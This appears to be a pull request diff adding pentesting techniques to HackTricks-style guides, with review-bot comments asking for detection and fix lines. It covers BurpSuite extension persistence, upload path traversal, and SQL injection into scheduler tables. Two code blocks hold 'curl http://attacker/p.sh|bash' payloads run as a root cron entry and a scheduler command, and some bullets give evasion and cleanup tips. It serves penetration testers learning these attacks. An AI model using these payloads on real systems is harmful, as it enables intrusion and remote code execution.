7 changes: 7 additions & 0 deletions src/linux-hardening/linux-post-exploitation/README.md
@@ -132,12 +132,19 @@ Hardening
- Overwrite the in-memory `argv[0]` buffer after reading `/proc/self/cmdline` length and the `argv[0]` pointer, padding with NULs so `/proc/<pid>/cmdline` and `ps` also show the fake label.
- Hunt by comparing `Name:` in `/proc/<pid>/status` against the real executable path and looking for loopback mutex listeners owned by processes with tiny/blank cmdlines.

## BurpSuite extension persistence (userland)

- Burp stores extension autoload configuration in user-level settings (e.g., `~/.BurpSuite/UserConfig*.json` on Linux/macOS or `%USERPROFILE%\.BurpSuite\` on Windows). Appending a malicious JAR/Python extension path with `autoload":true` causes Burp to execute the payload whenever the user launches BurpSuite.
- Delivery flow: drop the extension file into a writable profile directory, patch the JSON settings to add the extender entry (type, path, and enabled/autoload flags), and ensure "Automatically reload extensions on startup" is enabled in the options block.
- Persistence trigger is user-driven (opening BurpSuite), making it stealthier than system-level autoruns while still granting execution in the context of a tester’s workstation.

## References

- [0xdf – HTB Planning (Grafana env creds reuse, systemd BASIC_AUTH)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html)
- [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui)
- [0xdf – HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
- [GnuPG Manual – Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir)
- [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/)
- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026)

{{#include ../../banners/hacktricks-training.md}}
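Review bot: the settings fragment `autoload":true` in the first BurpSuite bullet is malformed JSON (the key is missing its opening quote); write it as `"autoload": true` so readers can match it against the file. This hunk also lands under the `Hardening` heading shown in its context line, and the preceding bullets pair each technique with a `Hunt by ...` line, but the new section has none; add one such as `- Hunt by diffing ~/.BurpSuite/UserConfig*.json for extension entries whose path lies outside the expected extension directory, and alert on writes to that file by any process other than Burp itself.`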
14 changes: 14 additions & 0 deletions src/pentesting-web/file-upload/README.md
@@ -549,6 +549,19 @@ Content-Type: application/json

Backend copies `file.filepath`, so the response returns that path’s content. Common chain: read `/proc/self/environ` to learn `$HOME`, then `$HOME/.n8n/config` for keys and `$HOME/.n8n/database.sqlite` for user identifiers.

### Path traversal on upload destination (arbitrary file write → RCE)

If the upload handler uses an attacker-controlled path component (e.g., a `guid`/`path` parameter) to build the destination, path traversal converts the upload into **arbitrary file write**:

- **Windows:** traverse into the webroot (e.g., `../../inetpub/wwwroot/shell.aspx`) and write a webshell that the attacker triggers over HTTP.
- **Linux:** traverse to `/etc/cron.d/<name>` and drop a cron entry that executes commands as root when cron parses the file:

```cron
* * * * * root /bin/bash -c 'curl http://attacker/p.sh|bash'
```

- Ensure the request sets the traversal inside the server-side path segment, not just the filename field, and keep payload size small to avoid logging throttles. This turns a pre-auth upload into code execution even when the handler was intended for benign blobs only.

## References

- [n8n form upload Content-Type confusion → arbitrary file read PoC](https://github.com/Chocapikk/CVE-2026-21858)
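Review bot: the clause "keep payload size small to avoid logging throttles" in the last bullet is unexplained and reads as guesswork; either cite where that throttle was observed or drop it. The section names the root cause (an attacker-controlled `guid`/`path` component used to build the destination) but never the fix; add a line after the `cron` block, e.g. `- Fix: resolve the final destination with realpath and reject it unless it stays inside the upload root; never take path components from the request.` Finally, the heading uses `→` while the rest of this file's headings spell it out; keep one style.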
@@ -567,6 +580,7 @@ Backend copies `file.filepath`, so the response returns that path’s content. C
- [CVE-2024-21546 – NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546)
- [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)
- [0xdf – HTB Environment (UniSharp LFM upload → PHP RCE)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026)
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
- [Microsoft – mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink)
- [0xdf – HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion → PHP RCE)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html)
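Review bot: the new `Metasploit Wrap-Up 01/30/2026` entry is inserted between two 0xdf HTB write-ups rather than at the end of the list, and unlike its neighbours it carries no parenthetical saying which section it supports; move it to the end and add one (the other entries use the form `Title (technique)`).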
17 changes: 17 additions & 0 deletions src/pentesting-web/sql-injection/README.md
@@ -659,6 +659,22 @@ Mitigations:
https://github.com/m4ll0k/Atlas
{{#endref}}

### SQLi as a write primitive to scheduler/cron tables (RCE)

If an authenticated endpoint is reachable pre-auth via an **auth bypass** and contains SQLi, treat the database as a **write primitive** instead of just data exfil:

- Target scheduler tables (e.g. `cron_job`, `task_queue`, `jobs`) that the application daemon periodically executes. Insert a row that runs your command and mark it enabled/active.
- Example payload (conceptual – adapt to the schema):

```sql
INSERT INTO cron_job (id, name, command, enabled, nextrun)
VALUES (1337, 'healthcheck', 'bash -c "curl http://attacker/p.sh|bash"', 1, NOW());
```

- Some apps sanitize job names but not the command body; keep the command small and pull a second stage over HTTP(S).
- After the scheduler tick runs, you gain OS command execution even when direct stacked queries/`xp_cmdshell` aren’t possible.
- Cleanup: delete the job or set `enabled=0` once a session is established to reduce noise.

## Other Guides

- [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com)
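Review bot: the context line shows this section is appended right after a `Mitigations:` block, yet it introduces a new RCE path with no mitigation of its own; add a bullet after the cleanup line, e.g. `- Mitigation: run the application's DB account without INSERT/UPDATE on scheduler tables, have the scheduler allowlist the commands it will execute, and alert on new or modified rows in those tables.` The `INSERT` example hard-codes `id` 1337, `NOW()` and an `enabled` column while the prose calls it conceptual; put a `-- conceptual, schema-dependent` comment inside the fence so the block is not copied verbatim.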
@@ -674,5 +690,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt
## References

- [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026)

{{#include ../../banners/hacktricks-training.md}}
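Review bot: the existing entry in this References list is written as a bare URL (`[https://blog.sicuranext.com/...](...)`) while the added `Metasploit Wrap-Up 01/30/2026` line uses a descriptive title; pick one convention for the list. The same Metasploit reference is added to all three files in this PR with no hint of which technique it backs in each; a short parenthetical per file would let readers tie it to the right section.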